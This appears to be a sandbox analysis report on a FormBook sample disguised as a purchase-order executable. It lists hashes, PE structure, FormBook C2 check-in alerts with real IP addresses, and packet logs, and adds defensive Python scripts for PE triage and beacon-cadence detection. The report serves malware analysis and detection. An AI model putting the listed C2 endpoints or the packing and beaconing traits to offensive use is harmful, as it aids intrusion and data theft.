                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 14.248.199.46
                                                                                                      PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • 203.161.46.205
                                                                                                      No context
                                                                                                      No context

Process: C:\Users\user\Desktop\PO 20495088.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1172
Entropy (8bit): 5.334969974494148
Encrypted: false
SSDEEP: 24:3hWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:xWSU4y4RQmFoUeWmfmZ9tK8NDE
MD5: 9A86426245C2DB332CCD92130B01087D
SHA1: 258015A0D102C1C60AF508E52F5172C4E9E64ECC
SHA-256: 4F40A508B46C447C257EFEB321A864AE4B4D8168C2A0DDAE70E60778BA1B37E4
SHA-512: C9CB989F69F7B4F12872CBDB8CFF919D63F47D62C727C4D4AE4E66E128939575783B391242825E27AE7C15654510FD1A7D601EF23C4799F749FBD9BB3A4D4FC6
Malicious: false

Process: C:\Windows\SysWOW64\sdiagnhost.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.97070844261029
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:PO 20495088.exe
                                                                                                      File size:710'144 bytes
                                                                                                      MD5:68465dd1e3101b1bfa0cff10ebadb8cc
                                                                                                      SHA1:31a5c7aa99d175e9ed04c325831c8ad7b281a255
                                                                                                      SHA256:d709e53e4afc4e29076812e41282fe82bcf2f3d73abe7016f13a41f432f4bd75
                                                                                                      SHA512:1675df94ed6fe694ae61a9fe170d0281454d3ba3f6ac3ae977d311581a42b28dc973a64d841370d00adb0911cd1b2d7569dbba8398a4b704ba35d22d4256f63d
                                                                                                      SSDEEP:12288:kxHD/s0yzbqUs19GN9sj5E4rUSsXm2sPHooPabg8SXiI8YcB2mTxI/OBXu:mjGbqiAjOTHXm2voCbgzXiIxmt1k8X
                                                                                                      TLSH:13E423C136EC6D2FD6B58A394C60CC644EB66067A512F6BC0FCD60CA8D56B0E0B51E6B
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g..............0.............z.... ........@.. ....................... ............`................................
                                                                                                      Icon Hash:69d3e4646c6c4e4e
                                                                                                      Entrypoint:0x4add7a
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x673A858F [Mon Nov 18 00:08:47 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al        (repeated 97 times)

The entry point (0x4add7a, in .text) is the stock managed-image stub: a single jmp through the IAT slot at 0x402000 (imagebase 0x400000 + IAT directory RVA 0x2000), which the loader fills with mscoree.dll!_CorExeMain, the file's only import. The bytes after the six-byte stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al, hence the 97 identical lines. This native listing therefore says nothing about the sample's behaviour; that lives in the IL, and the 7.977-bit entropy of the .text section points to a packed or encrypted payload rather than plain compiled code.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xadd25          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xae000          0x1278        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb0000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xac4a8          0x54          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xabd80       0xabe00   8d5585b1becd71f1777a0d5834b4295a  False     0.9682855113636364   data       7.977130763165481    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xae000          0x1278        0x1400    b652d66636a4004229fc85b6044d9096  False     0.6830078125         data       6.6941378585979345   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb0000          0xc           0x200     c6c98fab209d61c82e5ca9911e0177d8  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0xae0c8  0xea7  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.8216475606504932
RT_GROUP_ICON  0xaef80  0x14   data                                                                            1.05
RT_VERSION     0xaefa4  0x2ce  data                                                                            0.4387186629526462
DLL          Import
mscoree.dll  _CorExeMain
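The static fields above (data directories, section table, entropy, the jmp-through-IAT entry stub) are what a triage script checks before anything is executed. The following is an added example, not Joe Sandbox code and not the sample's own: a standard-library PE32 parser that recovers those fields, computes per-section Shannon entropy, and verifies that the entry point is the mscoree.dll!_CorExeMain thunk rather than native code. Because the real sample cannot be shipped here, build_sample_pe() constructs a small PE32 in memory with the same shape (IAT at RVA 0x2000, CLR header at RVA 0x2008, entry point jmp dword ptr [0x402000], .text/.rsrc/.reloc); its section sizes, filler bytes and the 7.2-bit entropy threshold are the example's own assumptions, while the timestamp, characteristics and directory layout are copied from the report.

```python
"""PE32 triage: data directories, sections, entropy, managed entry stub.
Added example, not Joe Sandbox code; standard library only.  build_sample_pe()
is a constructed stand-in for the real file so the script runs offline."""
import hashlib
import math
import struct
from collections import namedtuple

DIR_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
             "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
             "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
IMAGE_SCN_MEM_EXECUTE = 0x20000000
Section = namedtuple("Section", "name va vsize raw_off raw_size chars")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(img: bytes):
    """Return (entry RVA, image base, {dir name: (rva, size)}, [Section]) of a PE32."""
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    if img[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", img, coff + 2)[0]
    opt_size = struct.unpack_from("<H", img, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", img, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    entry_rva = struct.unpack_from("<I", img, opt + 16)[0]
    image_base = struct.unpack_from("<I", img, opt + 28)[0]
    dirs = {name: (0, 0) for name in DIR_NAMES}
    for i in range(min(struct.unpack_from("<I", img, opt + 92)[0], 16)):
        dirs[DIR_NAMES[i]] = struct.unpack_from("<II", img, opt + 96 + 8 * i)
    sections = []
    for i in range(nsec):
        hdr = img[opt + opt_size + 40 * i:][:40]
        vsize, va, rsize, roff = struct.unpack_from("<IIII", hdr, 8)
        sections.append(Section(hdr[:8].rstrip(b"\0").decode("ascii", "replace"),
                                va, vsize, roff, rsize, struct.unpack_from("<I", hdr, 36)[0]))
    return entry_rva, image_base, dirs, sections


def section_of(sections, rva):
    return next((s for s in sections if s.va <= rva < s.va + max(s.vsize, s.raw_size)), None)


def read_rva(img, sections, rva, n):
    """Map an RVA to a file offset through the section table and read n bytes."""
    s = section_of(sections, rva)
    return img[s.raw_off + (rva - s.va):][:n] if s else b""


def is_clr_entry_stub(img, base, entry_rva, dirs, sections) -> bool:
    """A managed PE32 starts with 'FF 25 imm32' (jmp dword ptr [imm32]) whose slot
    lies inside the IAT directory: the mscoree.dll!_CorExeMain thunk.  Anything
    else at the entry point of a file claiming to be .NET deserves a closer look."""
    code = read_rva(img, sections, entry_rva, 6)
    if len(code) < 6 or code[:2] != b"\xff\x25":
        return False
    slot_rva = struct.unpack_from("<I", code, 2)[0] - base
    iat_rva, iat_size = dirs["IAT"]
    return iat_size > 0 and iat_rva <= slot_rva < iat_rva + iat_size


def triage(img: bytes) -> dict:
    entry, base, dirs, secs = parse_pe32(img)
    entry_sec = section_of(secs, entry)
    out = {"entry_section": entry_sec.name if entry_sec else None,
           "managed": dirs["COM_DESCRIPTOR"][1] > 0,
           "clr_entry_stub": is_clr_entry_stub(img, base, entry, dirs, secs),
           "section_entropy": {}, "packed_code": []}
    for s in secs:
        ent = shannon_entropy(img[s.raw_off:s.raw_off + s.raw_size])
        out["section_entropy"][s.name] = round(ent, 3)
        # An executable section near 8 bits/byte (7.977 for .text above) carries
        # compressed or encrypted payload, not compiled IL or x86 code. 7.2 is an
        # assumed threshold for this example.
        if s.chars & IMAGE_SCN_MEM_EXECUTE and ent > 7.2:
            out["packed_code"].append(s.name)
    return out


def build_sample_pe() -> bytes:
    """Constructed PE32 (not the real sample): hash-chain filler stands in for the
    encrypted payload; timestamp, flags and directory layout follow the report."""
    text = bytearray(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128)))
    text[0x000:0x008] = b"\0" * 8                                        # IAT slot (_CorExeMain)
    text[0x008:0x050] = struct.pack("<IHH", 0x48, 2, 5) + b"\0" * 0x40   # CLR header, v2.5
    text[0x100:0x106] = b"\xff\x25" + struct.pack("<I", 0x402000)        # jmp dword ptr [0x402000]
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x673A858F, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", 0x10B, 8, 0, 0x1000, 0x400, 0,
                      0x2100, 0x2000, 0x3000, 0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,
                      0, 0x5000, 0x200, 0, 2, 0x8560, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2], dirs[5] = (0x2E00, 0x4F), (0x3000, 0x200), (0x4000, 0xC)
    dirs[12], dirs[14] = (0x2000, 0x8), (0x2008, 0x48)
    sec = lambda n, va, vs, ro, rs, ch: struct.pack("<8sIIIIIIHHI", n, vs, va, rs, ro, 0, 0, 0, 0, ch)
    hdr = (bytes(dos) + b"PE\0\0" + coff + opt + b"".join(struct.pack("<II", *d) for d in dirs)
           + sec(b".text", 0x2000, 0x1000, 0x200, 0x1000, 0x60000020)
           + sec(b".rsrc", 0x3000, 0x200, 0x1200, 0x200, 0x40000040)
           + sec(b".reloc", 0x4000, 0xC, 0x1400, 0x200, 0x42000040)).ljust(0x200, b"\0")
    return hdr + bytes(text) + (b"VS_VERSION_INFO " * 0x20) + b"\0" * 0x200
```

Run triage(open(path, "rb").read()) against a real file; for the constructed image it reports entry_section ".text", managed True, clr_entry_stub True and packed_code [".text"]. The useful signal in practice is the combination: a managed image whose entry stub is intact (so nothing was patched in natively) but whose only code section is near 8 bits/byte, which is what the report's numbers show and what the "potential unpacker" and process-injection findings above are consistent with.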
Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-11-18T13:53:55.227011+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  49981        13.248.169.48   80         TCP
2024-11-18T13:54:11.191475+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49983        208.91.197.27   80         TCP
2024-11-18T13:54:13.720381+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49984        208.91.197.27   80         TCP
2024-11-18T13:54:16.283499+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49985        208.91.197.27   80         TCP
2024-11-18T13:54:19.559545+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  49986        208.91.197.27   80         TCP
2024-11-18T13:54:25.903982+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49987        149.115.238.44  80         TCP
2024-11-18T13:54:28.439248+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49988        149.115.238.44  80         TCP
2024-11-18T13:54:31.002383+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49989        149.115.238.44  80         TCP
2024-11-18T13:54:33.545770+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  49990        149.115.238.44  80         TCP
2024-11-18T13:54:39.371399+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49991        75.2.103.23     80         TCP
2024-11-18T13:54:41.914814+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49992        75.2.103.23     80         TCP
2024-11-18T13:54:44.536201+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49993        75.2.103.23     80         TCP
2024-11-18T13:54:47.013061+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  49994        75.2.103.23     80         TCP
2024-11-18T13:54:52.679411+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49995        3.33.130.190    80         TCP
2024-11-18T13:54:55.249077+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49996        3.33.130.190    80         TCP
2024-11-18T13:54:57.793693+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49997        3.33.130.190    80         TCP
2024-11-18T13:55:00.343673+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  49998        3.33.130.190    80         TCP
2024-11-18T13:55:06.170220+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  49999        203.161.49.193  80         TCP
2024-11-18T13:55:08.732594+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50000        203.161.49.193  80         TCP
2024-11-18T13:55:11.279589+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50001        203.161.49.193  80         TCP
2024-11-18T13:55:13.810779+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  50002        203.161.49.193  80         TCP
2024-11-18T13:55:20.373450+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50003        104.21.74.79    80         TCP
2024-11-18T13:55:22.916474+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50004        104.21.74.79    80         TCP
2024-11-18T13:55:25.468482+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50005        104.21.74.79    80         TCP
2024-11-18T13:55:28.069698+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  50006        104.21.74.79    80         TCP
2024-11-18T13:55:33.729770+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50007        15.197.204.56   80         TCP
2024-11-18T13:55:36.299878+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50008        15.197.204.56   80         TCP
2024-11-18T13:55:38.839198+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50009        15.197.204.56   80         TCP
2024-11-18T13:55:41.385027+0100  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.5  50010        15.197.204.56   80         TCP
2024-11-18T13:55:47.418870+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50011        188.114.97.3    80         TCP
2024-11-18T13:55:49.916029+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50012        188.114.97.3    80         TCP
2024-11-18T13:55:52.522957+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.5  50013        188.114.97.3    80         TCP
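The alert list has a shape worth measuring rather than eyeballing: every destination is hit on port 80 with three POST check-ins followed by one GET, roughly 2.5 s apart, and then the sample moves to the next host about 13 to 16 s later, never going back. That one-host-at-a-time walk through an embedded list is the FormBook check-in behaviour these ETPRO rules fire on, and it is a stronger signal than any single alert. The following is an added example, not Joe Sandbox output: it parses a constructed, pipe-separated copy of the first thirteen rows above (the field order and separator are the example's own; the values are the report's) and computes per-destination request patterns, mean intra-host gaps, host-to-host hop intervals and whether the destinations were contacted strictly sequentially.

```python
"""Beacon cadence from the FormBook check-in alerts above.  Added example, not
Joe Sandbox output.  ALERTS is a constructed, pipe-separated copy of the first
13 Suricata rows (timestamp | SID | signature | src | sport | dst | dport)."""
from collections import defaultdict
from datetime import datetime

ALERTS = """\
2024-11-18T13:53:55.227011+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 192.168.2.5 | 49981 | 13.248.169.48 | 80
2024-11-18T13:54:11.191475+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49983 | 208.91.197.27 | 80
2024-11-18T13:54:13.720381+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49984 | 208.91.197.27 | 80
2024-11-18T13:54:16.283499+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49985 | 208.91.197.27 | 80
2024-11-18T13:54:19.559545+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 192.168.2.5 | 49986 | 208.91.197.27 | 80
2024-11-18T13:54:25.903982+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49987 | 149.115.238.44 | 80
2024-11-18T13:54:28.439248+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49988 | 149.115.238.44 | 80
2024-11-18T13:54:31.002383+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49989 | 149.115.238.44 | 80
2024-11-18T13:54:33.545770+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 192.168.2.5 | 49990 | 149.115.238.44 | 80
2024-11-18T13:54:39.371399+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49991 | 75.2.103.23 | 80
2024-11-18T13:54:41.914814+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49992 | 75.2.103.23 | 80
2024-11-18T13:54:44.536201+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 192.168.2.5 | 49993 | 75.2.103.23 | 80
2024-11-18T13:54:47.013061+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 192.168.2.5 | 49994 | 75.2.103.23 | 80
"""


def parse_alert(line: str) -> dict:
    ts, sid, sig, src, sport, dst, dport = (f.strip() for f in line.split("|"))
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), "sid": int(sid),
            "method": "POST" if "(POST)" in sig else "GET", "sig": sig,
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport)}


def load_alerts(text: str) -> list:
    """Parse and time-order the rows; everything below assumes this ordering."""
    return sorted((parse_alert(l) for l in text.splitlines() if l.strip()),
                  key=lambda a: a["ts"])


def beacon_profile(alerts: list) -> list:
    """Per destination: request pattern (P=POST, G=GET), count, ports, mean gap."""
    by_dst = defaultdict(list)
    for a in alerts:
        by_dst[a["dst"]].append(a)
    profile = []
    for dst, rows in by_dst.items():
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rows, rows[1:])]
        profile.append({"dst": dst, "first": rows[0]["ts"], "count": len(rows),
                        "pattern": "".join(a["method"][0] for a in rows),
                        "ports": sorted({a["dport"] for a in rows}),
                        "mean_gap_s": round(sum(gaps) / len(gaps), 2) if gaps else None})
    return sorted(profile, key=lambda p: p["first"])


def rotation_order(alerts: list) -> list:
    """Destinations in contact order, consecutive duplicates collapsed into runs."""
    order = []
    for a in alerts:
        if not order or order[-1] != a["dst"]:
            order.append(a["dst"])
    return order


def hop_intervals(profile: list) -> list:
    """Seconds from the first alert for one destination to the first for the next."""
    return [round((b["first"] - a["first"]).total_seconds(), 2)
            for a, b in zip(profile, profile[1:])]


def sequential_walk(alerts: list, min_hosts: int = 3) -> bool:
    """True when at least min_hosts destinations were each contacted in one
    unbroken run: the list-walk shape, as opposed to a client that fans out
    to several hosts in parallel or retries an earlier one."""
    order = rotation_order(alerts)
    return len(order) >= min_hosts and len(order) == len(set(order))
```

On the rows above this yields patterns G, PPPG, PPPG, PPPG, mean intra-host gaps of about 2.5 to 2.8 s, hop intervals of 15.96, 14.71 and 13.47 s, and sequential_walk True. The first host gets only a GET because the capture starts with the initial check-in; the remaining rows in the table continue the same three-POST-one-GET cycle through 3.33.130.190, 203.161.49.193, 104.21.74.79, 15.197.204.56 and 188.114.97.3. Note that the destinations include large shared hosting and CDN address space, so blocking on IP alone is unreliable; the cadence and the sequential walk are what to alert on.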
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 18, 2024 13:53:54.517088890 CET  49981        80         192.168.2.5    13.248.169.48
Nov 18, 2024 13:53:54.522011995 CET  80           49981      13.248.169.48  192.168.2.5
Nov 18, 2024 13:53:54.522078037 CET  49981        80         192.168.2.5    13.248.169.48
Nov 18, 2024 13:53:54.536928892 CET  49981        80         192.168.2.5    13.248.169.48
Nov 18, 2024 13:53:54.541877031 CET  80           49981      13.248.169.48  192.168.2.5
Nov 18, 2024 13:53:55.193813086 CET  80           49981      13.248.169.48  192.168.2.5
Nov 18, 2024 13:53:55.226898909 CET  80           49981      13.248.169.48  192.168.2.5
Nov 18, 2024 13:53:55.227010965 CET  49981        80         192.168.2.5    13.248.169.48
Nov 18, 2024 13:53:55.228164911 CET  49981        80         192.168.2.5    13.248.169.48
Nov 18, 2024 13:53:55.233042955 CET  80           49981      13.248.169.48  192.168.2.5
Nov 18, 2024 13:54:10.581257105 CET  49983        80         192.168.2.5    208.91.197.27
Nov 18, 2024 13:54:10.586203098 CET  80           49983      208.91.197.27  192.168.2.5
Nov 18, 2024 13:54:10.586327076 CET  49983        80         192.168.2.5    208.91.197.27
Nov 18, 2024 13:54:10.600955009 CET  49983        80         192.168.2.5    208.91.197.27
Nov 18, 2024 13:54:10.605914116 CET  80           49983      208.91.197.27  192.168.2.5
Nov 18, 2024 13:54:11.191390991 CET  80           49983      208.91.197.27  192.168.2.5
Nov 18, 2024 13:54:11.191474915 CET  49983        80         192.168.2.5    208.91.197.27
                                                                                                      Nov 18, 2024 13:54:12.107860088 CET4998380192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:12.112806082 CET8049983208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.125946999 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:13.131542921 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.131681919 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:13.140285015 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:13.145541906 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.720292091 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:13.720381021 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:14.654769897 CET4998480192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:14.659797907 CET8049984208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:15.673496008 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:15.678456068 CET8049985208.91.197.27192.168.2.5
                                                                                                      Nov 18, 2024 13:54:15.678611994 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:15.692220926 CET4998580192.168.2.5208.91.197.27
                                                                                                      Nov 18, 2024 13:54:15.697542906 CET8049985208.91.197.27192.168.2.5
